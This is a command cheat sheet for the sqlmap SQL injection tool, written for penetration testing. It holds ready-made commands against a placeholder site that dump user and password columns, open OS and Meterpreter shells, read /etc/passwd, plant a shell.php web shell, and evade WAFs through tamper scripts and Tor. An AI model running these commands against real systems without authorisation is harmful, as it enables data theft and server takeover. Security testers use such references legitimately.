sqlmap
Automatic SQL injection detection and exploitation tool.
Quickstart
sqlmap -u "https://target.com/page?id=1"
sqlmap -u "https://target.com/login" --data="user=admin&pass=test"
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123"
sqlmap -u "https://target.com/page?id=1" --dump
Core Concepts
| Concept |
Description |
| Detection |
Find injectable parameters |
| Exploitation |
Extract data, get shell |
| Techniques |
UNION, blind, time-based, etc. |
| Tamper |
Bypass WAF/filters |
Syntax
sqlmap -u <url> [options]
sqlmap -r <request.txt> [options]
Options
Target
| Option |
Description |
-u <url> |
Target URL with parameter |
-r <file> |
Load request from file |
-p <param> |
Testable parameter |
--data <data> |
POST data |
--cookie <c> |
Cookie string |
-H <header> |
Extra header |
Detection
| Option |
Description |
--level <1-5> |
Test level (default 1) |
--risk <1-3> |
Risk level (default 1) |
--technique <tech> |
SQL techniques (BEUSTQ) |
--dbms <dbms> |
Force DBMS type |
Enumeration
| Option |
Description |
--dbs |
List databases |
--tables |
List tables |
--columns |
List columns |
--dump |
Dump table data |
-D <db> |
Target database |
-T <table> |
Target table |
-C <cols> |
Target columns |
--dump-all |
Dump everything |
Access
| Option |
Description |
--os-shell |
OS shell |
--os-pwn |
Meterpreter shell |
--sql-shell |
SQL shell |
--file-read <f> |
Read file |
--file-write <f> |
Write file |
Bypass
| Option |
Description |
--tamper <script> |
Tamper script |
--random-agent |
Random user agent |
--proxy <url> |
Proxy |
--tor |
Use Tor |
--skip-waf |
Skip WAF detection |
| Option |
Description |
--threads <n> |
Threads |
--time-sec <sec> |
Time-based delay |
--batch |
Non-interactive (defaults) |
Recipes
Basic Testing
sqlmap -u "https://target.com/page?id=1"
sqlmap -u "https://target.com/login" --data="user=admin&pass=test"
sqlmap -u "https://target.com/page?id=1&name=test" -p id
sqlmap -u "https://target.com/page?id=1" --batch
From Request File
sqlmap -r request.txt
sqlmap -r request.txt -p id
Detection Levels
sqlmap -u "https://target.com/page?id=1"
sqlmap -u "https://target.com/page?id=1" --level 3
sqlmap -u "https://target.com/page?id=1" --level 5 --risk 3
sqlmap -u "https://target.com/page" --level 2 --cookie="id=1"
Database Enumeration
sqlmap -u "https://target.com/page?id=1" --dbs
sqlmap -u "https://target.com/page?id=1" -D database --tables
sqlmap -u "https://target.com/page?id=1" -D database -T users --columns
sqlmap -u "https://target.com/page?id=1" -D database -T users --dump
sqlmap -u "https://target.com/page?id=1" -D database -T users -C "username,password" --dump
Shell Access
sqlmap -u "https://target.com/page?id=1" --sql-shell
sqlmap -u "https://target.com/page?id=1" --os-shell
sqlmap -u "https://target.com/page?id=1" --os-pwn
File Operations
sqlmap -u "https://target.com/page?id=1" --file-read="/etc/passwd"
sqlmap -u "https://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
WAF Bypass
sqlmap -u "https://target.com/page?id=1" --random-agent
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between,randomcase
Specific Techniques
sqlmap -u "https://target.com/page?id=1" --technique=U
sqlmap -u "https://target.com/page?id=1" --technique=T
sqlmap -u "https://target.com/page?id=1" --technique=BEUSTQ
Through Proxy
sqlmap -u "https://target.com/page?id=1" --proxy="http://127.0.0.1:8080"
sqlmap -u "https://target.com/page?id=1" --tor --check-tor
Output & Parsing
sqlmap -u "https://target.com/page?id=1" --dump --output-dir=./results
cat ~/.sqlmap/output/target.com/dump/database/users.csv
Troubleshooting
| Issue |
Solution |
| No injection found |
Increase --level and --risk |
| WAF blocking |
Use --tamper, --random-agent |
| Slow |
Reduce threads, check technique |
| False positive |
Verify manually |
References